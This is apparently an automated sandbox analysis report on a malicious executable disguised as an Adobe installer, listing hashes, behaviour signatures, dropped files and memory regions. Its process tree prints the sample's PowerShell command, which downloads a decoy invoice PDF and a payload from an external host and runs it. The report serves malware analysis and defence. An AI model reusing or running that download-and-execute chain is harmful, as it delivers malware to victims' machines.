Analysis

  • max time kernel
    121s
  • max time network
    127s
  • platform
    windows7_x64
  • resource
    win7-20231020-en
  • resource tags

    arch:x64arch:x86image:win7-20231020-enlocale:en-usos:windows7-x64system
  • submitted
    21/10/2023, 18:07

General

  • Target

    NEAS.NEAS1b371acf222005ea1b34043a9564b71639c6931bb8715895eeadf55d93f5f139exeexe_JC.exe

  • Size

    4.2MB

  • MD5

    ed103156b3c59b8fdb8835669621df16

  • SHA1

    dedf2318543b53c26563634d04f9e22e9efcf849

  • SHA256

    1b371acf222005ea1b34043a9564b71639c6931bb8715895eeadf55d93f5f139

  • SHA512

    9660b20e9df4d8dc3c73b9383d0d35507da4190588c5ccaadbfde39375cf9a537f05ea5c8a9bbd4355a74dbda0702a08b332c3813769e948ef659480d5804391

  • SSDEEP

    49152:QQyV3YBybPP3NSqBfTna5ouw4yAhYVvdEnfZeosfJ5OV/Sm/+fCYyWj1aZeKv1x+:IhxzP3MqBfTluw4yctnfZeosyVtga

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 5 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Windows directory 12 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies system certificate store 2 TTPs 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of WriteProcessMemory 37 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\NEAS.NEAS1b371acf222005ea1b34043a9564b71639c6931bb8715895eeadf55d93f5f139exeexe_JC.exe
    "C:\Users\Admin\AppData\Local\Temp\NEAS.NEAS1b371acf222005ea1b34043a9564b71639c6931bb8715895eeadf55d93f5f139exeexe_JC.exe"
    1⤵
    • Enumerates connected drives
    • Modifies system certificate store
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:2136
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Reader\Adobe 1.0.0\install\00CDD96\Adobe.msi" AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\NEAS.NEAS1b371acf222005ea1b34043a9564b71639c6931bb8715895eeadf55d93f5f139exeexe_JC.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1697652260 " AI_EUIMSI=""
      2⤵
      • Blocklisted process makes network request
      • Enumerates connected drives
      • Suspicious use of FindShellTrayWindow
      PID:2912
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Blocklisted process makes network request
    • Enumerates connected drives
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3044
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding B19FCEF1C7AA9986A71EE9810F29DB5F C
      2⤵
      • Loads dropped DLL
      PID:2868
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding 9193324953174605B686DFDC42C4D483
      2⤵
      • Loads dropped DLL
      PID:1088
    • C:\Windows\Installer\MSI6488.tmp
      "C:\Windows\Installer\MSI6488.tmp" "C:\Users\Admin\AppData\Roaming\Reader\Adobe\Fattura24.vbs"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      PID:2960
  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Reader\Adobe\Fattura24.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:812
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $r = 'cd $env:TEMP;iwr https://studioaziende.click/Fattura2023.pdf -o fattura.pdf;powershell iwr -Uri https://studioaziende.click/defence.dll -o AdobeReader.exe;Start-Process AdobeReader.exe;Start-Sleep 15;Start-Process fattura.pdf ';powershell $iex($r)
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2968
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cd $env:TEMP;iwr https://studioaziende.click/Fattura2023.pdf -o fattura.pdf;powershell iwr -Uri https://studioaziende.click/defence.dll -o AdobeReader.exe;Start-Process AdobeReader.exe;Start-Sleep 15;Start-Process fattura.pdf "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2004
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iwr -Uri https://studioaziende.click/defence.dll -o AdobeReader.exe
          4⤵
            PID:1724

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Config.Msi\f7657e4.rbs

      Filesize

      10KB

      MD5

      095217a686881a627bdfb9ba448a44b2

      SHA1

      868265a4eafbfedfeb515ff4557a4039f7a26d9e

      SHA256

      15863df592a613d9f1a6a5ca68b19cda3d4fe4553688a2baf75ad7939cae22b6

      SHA512

      d65058bdf2f92eec852c6ffde4fd27906153da4f878fd37c1b86fc893904660a460cd85bde123bad0030c84199af2e8b5eda73cf1b6537a123ed1541fe86085b

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

      Filesize

      344B

      MD5

      36a33ad95ee64ee5da1f95c836e77bff

      SHA1

      2dd2636b65e44a7c7f99b8af0ca8ff852fca91cb

      SHA256

      817b4b16d06b7c60112663daf40748c3840dd00e29009b043d038a44c2d66338

      SHA512

      22fde4a92bb10a356cbc1992fcf866f79bf4f38d05156102a72d3d2a3fe13e53aeac5b5c02a157d8f65e78a8cc2cdd46ca60e71491c4bdbac69f0702d2482c35

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

      Filesize

      344B

      MD5

      f5695b716a8fb831a7095056ed9f2193

      SHA1

      cca1cf3460747237a40a924995a8fd774c3ae373

      SHA256

      ccdaa593351934a5d95a91cd69bf9eadd63847c46bc9f0ffb05867f76468f22d

      SHA512

      42cd93387d99e2372e391dcc735fc20ed801f8e199f7249baecbc64870dec1e7832bd82986aeea42dfb8884ea56d234d386f6e1b664c24655528f66994a4b76b

    • C:\Users\Admin\AppData\Local\Temp\Cab5015.tmp

      Filesize

      61KB

      MD5

      f3441b8572aae8801c04f3060b550443

      SHA1

      4ef0a35436125d6821831ef36c28ffaf196cda15

      SHA256

      6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf

      SHA512

      5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

    • C:\Users\Admin\AppData\Local\Temp\MSI5425.tmp

      Filesize

      719KB

      MD5

      c9c085c00bc24802f066e5412defcf50

      SHA1

      557f02469f3f236097d015327d7ca77260e2aecc

      SHA256

      a412b642de0e94db761ebd2834dde72eed86e65fc4a580670a300015b874ba24

      SHA512

      a6fa1f34cd630a7509a6441be7ad060de7e039967d2ec015e27c2a643b04e0eecf53902b7173c4c2e92e3a890bd7acb6a3307d9923838f0bfc71496fb184b1de

    • C:\Users\Admin\AppData\Local\Temp\Tar5047.tmp

      Filesize

      163KB

      MD5

      9441737383d21192400eca82fda910ec

      SHA1

      725e0d606a4fc9ba44aa8ffde65bed15e65367e4

      SHA256

      bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5

      SHA512

      7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

      Filesize

      7KB

      MD5

      3e17dfc28e757739c3fbb18627deed60

      SHA1

      bf865a12c88703a4daaa3f406d8ac42566fe47fd

      SHA256

      e6c01f4dab247964a827078faf3de7888f6a7d24b2413a15483c8b734cfaa43d

      SHA512

      2ba12baf6cef56f8eabe783c4922ec6cb499ada84531af750b257a06aa500cd6d394ce2381352b02384533a07540791c8d68896d90d6dfe3178255977c6df4d3

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

      Filesize

      7KB

      MD5

      3e17dfc28e757739c3fbb18627deed60

      SHA1

      bf865a12c88703a4daaa3f406d8ac42566fe47fd

      SHA256

      e6c01f4dab247964a827078faf3de7888f6a7d24b2413a15483c8b734cfaa43d

      SHA512

      2ba12baf6cef56f8eabe783c4922ec6cb499ada84531af750b257a06aa500cd6d394ce2381352b02384533a07540791c8d68896d90d6dfe3178255977c6df4d3

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FHVENCY3891KG9XGBCY8.temp

      Filesize

      7KB

      MD5

      3e17dfc28e757739c3fbb18627deed60

      SHA1

      bf865a12c88703a4daaa3f406d8ac42566fe47fd

      SHA256

      e6c01f4dab247964a827078faf3de7888f6a7d24b2413a15483c8b734cfaa43d

      SHA512

      2ba12baf6cef56f8eabe783c4922ec6cb499ada84531af750b257a06aa500cd6d394ce2381352b02384533a07540791c8d68896d90d6dfe3178255977c6df4d3

    • C:\Users\Admin\AppData\Roaming\Reader\Adobe 1.0.0\install\00CDD96\Adobe.msi

      Filesize

      2.5MB

      MD5

      5bb9d40b14a438e46628b97f76ca3b36

      SHA1

      97891f263a93fe89f8432165e74bcb7a5daadd39

      SHA256

      ac98a9db79127dffac9414781968f54988abd04d57203f32c98074fd84ad051b

      SHA512

      50bf5c8fc7ac9d103c5ed9aee05a0bd9a4ee1a1df4442b62fe7e20f42403971f916b6d14745d3e28f64efeed0e3b2d1a079495b9911ee93b70f8915d94559116

    • C:\Users\Admin\AppData\Roaming\Reader\Adobe 1.0.0\install\00CDD96\Adobe.msi

      Filesize

      2.5MB

      MD5

      5bb9d40b14a438e46628b97f76ca3b36

      SHA1

      97891f263a93fe89f8432165e74bcb7a5daadd39

      SHA256

      ac98a9db79127dffac9414781968f54988abd04d57203f32c98074fd84ad051b

      SHA512

      50bf5c8fc7ac9d103c5ed9aee05a0bd9a4ee1a1df4442b62fe7e20f42403971f916b6d14745d3e28f64efeed0e3b2d1a079495b9911ee93b70f8915d94559116

    • C:\Users\Admin\AppData\Roaming\Reader\Adobe 1.0.0\install\00CDD96\Fattura24.vbs

      Filesize

      1.8MB

      MD5

      3cb32c9a7e57f6518f4a6cfffd0973c6

      SHA1

      ed9eeb56d35d09971d83ac077aba62592be4c4ec

      SHA256

      494db56db2e454609b4747c9cc3f0b7bba25240608ed614b36c7c841ac60a365

      SHA512

      b18da1743098f5b3fc50d3bfcb3cf933612c8877a7b52cfe379e88ca804fba356d174dfa548a4c5b7905f629faa0129bdc0ca5b3a34f713eb34b51391424c857

    • C:\Users\Admin\AppData\Roaming\Reader\Adobe\Fattura24.vbs

      Filesize

      1.8MB

      MD5

      3cb32c9a7e57f6518f4a6cfffd0973c6

      SHA1

      ed9eeb56d35d09971d83ac077aba62592be4c4ec

      SHA256

      494db56db2e454609b4747c9cc3f0b7bba25240608ed614b36c7c841ac60a365

      SHA512

      b18da1743098f5b3fc50d3bfcb3cf933612c8877a7b52cfe379e88ca804fba356d174dfa548a4c5b7905f629faa0129bdc0ca5b3a34f713eb34b51391424c857

    • C:\Windows\Installer\MSI5AF0.tmp

      Filesize

      719KB

      MD5

      c9c085c00bc24802f066e5412defcf50

      SHA1

      557f02469f3f236097d015327d7ca77260e2aecc

      SHA256

      a412b642de0e94db761ebd2834dde72eed86e65fc4a580670a300015b874ba24

      SHA512

      a6fa1f34cd630a7509a6441be7ad060de7e039967d2ec015e27c2a643b04e0eecf53902b7173c4c2e92e3a890bd7acb6a3307d9923838f0bfc71496fb184b1de

    • C:\Windows\Installer\MSI5BCB.tmp

      Filesize

      719KB

      MD5

      c9c085c00bc24802f066e5412defcf50

      SHA1

      557f02469f3f236097d015327d7ca77260e2aecc

      SHA256

      a412b642de0e94db761ebd2834dde72eed86e65fc4a580670a300015b874ba24

      SHA512

      a6fa1f34cd630a7509a6441be7ad060de7e039967d2ec015e27c2a643b04e0eecf53902b7173c4c2e92e3a890bd7acb6a3307d9923838f0bfc71496fb184b1de

    • C:\Windows\Installer\MSI5BCB.tmp

      Filesize

      719KB

      MD5

      c9c085c00bc24802f066e5412defcf50

      SHA1

      557f02469f3f236097d015327d7ca77260e2aecc

      SHA256

      a412b642de0e94db761ebd2834dde72eed86e65fc4a580670a300015b874ba24

      SHA512

      a6fa1f34cd630a7509a6441be7ad060de7e039967d2ec015e27c2a643b04e0eecf53902b7173c4c2e92e3a890bd7acb6a3307d9923838f0bfc71496fb184b1de

    • C:\Windows\Installer\MSI5CD6.tmp

      Filesize

      719KB

      MD5

      c9c085c00bc24802f066e5412defcf50

      SHA1

      557f02469f3f236097d015327d7ca77260e2aecc

      SHA256

      a412b642de0e94db761ebd2834dde72eed86e65fc4a580670a300015b874ba24

      SHA512

      a6fa1f34cd630a7509a6441be7ad060de7e039967d2ec015e27c2a643b04e0eecf53902b7173c4c2e92e3a890bd7acb6a3307d9923838f0bfc71496fb184b1de

    • C:\Windows\Installer\MSI5DB1.tmp

      Filesize

      837KB

      MD5

      2557173f4299722afce46cc3c0616406

      SHA1

      b0343c9a9552be977834e415783b486c4714fe97

      SHA256

      e25369e33c7ef36151769a86d833189b275f85045f35873e9e931547e0a6d591

      SHA512

      24a46359cb8e22534cbd875fe092d096e3280ca4c24936159894ba95832233ee318494a3eabbdf73ae6010e39a1b5897b4488b2771b416b472bb7f60ceddf40e

    • C:\Windows\Installer\MSI6488.tmp

      Filesize

      404KB

      MD5

      3c8fa0835582e244dd647a601f71ef23

      SHA1

      ee9d581be2bd0af15607c04bc4a491e95265052f

      SHA256

      de6d76b0dd98db02f5bd0fd8e27996dfa6f59ebd1f9a59b40bbd7f1ce6cc2a9f

      SHA512

      f6a682e9ea1560f057bbe63779dde8b18d8444b75dc7d23d3612a8e80f595e3e6b749f20ee8b426f6e66e5f72da6cf7002437442d19c94fed10c4266cc91d677

    • \Users\Admin\AppData\Local\Temp\MSI5425.tmp

      Filesize

      719KB

      MD5

      c9c085c00bc24802f066e5412defcf50

      SHA1

      557f02469f3f236097d015327d7ca77260e2aecc

      SHA256

      a412b642de0e94db761ebd2834dde72eed86e65fc4a580670a300015b874ba24

      SHA512

      a6fa1f34cd630a7509a6441be7ad060de7e039967d2ec015e27c2a643b04e0eecf53902b7173c4c2e92e3a890bd7acb6a3307d9923838f0bfc71496fb184b1de

    • \Windows\Installer\MSI5AF0.tmp

      Filesize

      719KB

      MD5

      c9c085c00bc24802f066e5412defcf50

      SHA1

      557f02469f3f236097d015327d7ca77260e2aecc

      SHA256

      a412b642de0e94db761ebd2834dde72eed86e65fc4a580670a300015b874ba24

      SHA512

      a6fa1f34cd630a7509a6441be7ad060de7e039967d2ec015e27c2a643b04e0eecf53902b7173c4c2e92e3a890bd7acb6a3307d9923838f0bfc71496fb184b1de

    • \Windows\Installer\MSI5BCB.tmp

      Filesize

      719KB

      MD5

      c9c085c00bc24802f066e5412defcf50

      SHA1

      557f02469f3f236097d015327d7ca77260e2aecc

      SHA256

      a412b642de0e94db761ebd2834dde72eed86e65fc4a580670a300015b874ba24

      SHA512

      a6fa1f34cd630a7509a6441be7ad060de7e039967d2ec015e27c2a643b04e0eecf53902b7173c4c2e92e3a890bd7acb6a3307d9923838f0bfc71496fb184b1de

    • \Windows\Installer\MSI5CD6.tmp

      Filesize

      719KB

      MD5

      c9c085c00bc24802f066e5412defcf50

      SHA1

      557f02469f3f236097d015327d7ca77260e2aecc

      SHA256

      a412b642de0e94db761ebd2834dde72eed86e65fc4a580670a300015b874ba24

      SHA512

      a6fa1f34cd630a7509a6441be7ad060de7e039967d2ec015e27c2a643b04e0eecf53902b7173c4c2e92e3a890bd7acb6a3307d9923838f0bfc71496fb184b1de

    • \Windows\Installer\MSI5DB1.tmp

      Filesize

      837KB

      MD5

      2557173f4299722afce46cc3c0616406

      SHA1

      b0343c9a9552be977834e415783b486c4714fe97

      SHA256

      e25369e33c7ef36151769a86d833189b275f85045f35873e9e931547e0a6d591

      SHA512

      24a46359cb8e22534cbd875fe092d096e3280ca4c24936159894ba95832233ee318494a3eabbdf73ae6010e39a1b5897b4488b2771b416b472bb7f60ceddf40e

    • memory/1724-180-0x000007FEF6250000-0x000007FEF6BED000-memory.dmp

      Filesize

      9.6MB

    • memory/1724-183-0x000007FEF6250000-0x000007FEF6BED000-memory.dmp

      Filesize

      9.6MB

    • memory/1724-179-0x0000000002610000-0x0000000002690000-memory.dmp

      Filesize

      512KB

    • memory/1724-178-0x0000000002610000-0x0000000002690000-memory.dmp

      Filesize

      512KB

    • memory/1724-181-0x0000000002610000-0x0000000002690000-memory.dmp

      Filesize

      512KB

    • memory/1724-177-0x000007FEF6250000-0x000007FEF6BED000-memory.dmp

      Filesize

      9.6MB

    • memory/1724-182-0x0000000002610000-0x0000000002690000-memory.dmp

      Filesize

      512KB

    • memory/2004-191-0x0000000002450000-0x00000000024D0000-memory.dmp

      Filesize

      512KB

    • memory/2004-189-0x000007FEF6250000-0x000007FEF6BED000-memory.dmp

      Filesize

      9.6MB

    • memory/2004-190-0x0000000002450000-0x00000000024D0000-memory.dmp

      Filesize

      512KB

    • memory/2004-166-0x000007FEF6250000-0x000007FEF6BED000-memory.dmp

      Filesize

      9.6MB

    • memory/2004-167-0x0000000002450000-0x00000000024D0000-memory.dmp

      Filesize

      512KB

    • memory/2004-168-0x000007FEF6250000-0x000007FEF6BED000-memory.dmp

      Filesize

      9.6MB

    • memory/2004-169-0x0000000002450000-0x00000000024D0000-memory.dmp

      Filesize

      512KB

    • memory/2004-170-0x0000000002450000-0x00000000024D0000-memory.dmp

      Filesize

      512KB

    • memory/2004-171-0x0000000002450000-0x00000000024D0000-memory.dmp

      Filesize

      512KB

    • memory/2004-192-0x0000000002450000-0x00000000024D0000-memory.dmp

      Filesize

      512KB

    • memory/2004-193-0x0000000002450000-0x00000000024D0000-memory.dmp

      Filesize

      512KB

    • memory/2004-194-0x000007FEF6250000-0x000007FEF6BED000-memory.dmp

      Filesize

      9.6MB

    • memory/2136-158-0x0000000000380000-0x0000000000381000-memory.dmp

      Filesize

      4KB

    • memory/2136-0-0x0000000000380000-0x0000000000381000-memory.dmp

      Filesize

      4KB

    • memory/2960-142-0x00000000000B0000-0x00000000000B2000-memory.dmp

      Filesize

      8KB

    • memory/2968-149-0x000007FEF6250000-0x000007FEF6BED000-memory.dmp

      Filesize

      9.6MB

    • memory/2968-151-0x0000000001FD0000-0x0000000001FD8000-memory.dmp

      Filesize

      32KB

    • memory/2968-184-0x000007FEF6250000-0x000007FEF6BED000-memory.dmp

      Filesize

      9.6MB

    • memory/2968-185-0x0000000002990000-0x0000000002A10000-memory.dmp

      Filesize

      512KB

    • memory/2968-186-0x0000000002990000-0x0000000002A10000-memory.dmp

      Filesize

      512KB

    • memory/2968-187-0x0000000002990000-0x0000000002A10000-memory.dmp

      Filesize

      512KB

    • memory/2968-188-0x0000000002990000-0x0000000002A10000-memory.dmp

      Filesize

      512KB

    • memory/2968-148-0x000000001B160000-0x000000001B442000-memory.dmp

      Filesize

      2.9MB

    • memory/2968-159-0x0000000002990000-0x0000000002A10000-memory.dmp

      Filesize

      512KB

    • memory/2968-153-0x0000000002990000-0x0000000002A10000-memory.dmp

      Filesize

      512KB

    • memory/2968-155-0x0000000002990000-0x0000000002A10000-memory.dmp

      Filesize

      512KB

    • memory/2968-152-0x000007FEF6250000-0x000007FEF6BED000-memory.dmp

      Filesize

      9.6MB

    • memory/2968-150-0x0000000002990000-0x0000000002A10000-memory.dmp

      Filesize

      512KB

    • memory/2968-195-0x000007FEF6250000-0x000007FEF6BED000-memory.dmp

      Filesize

      9.6MB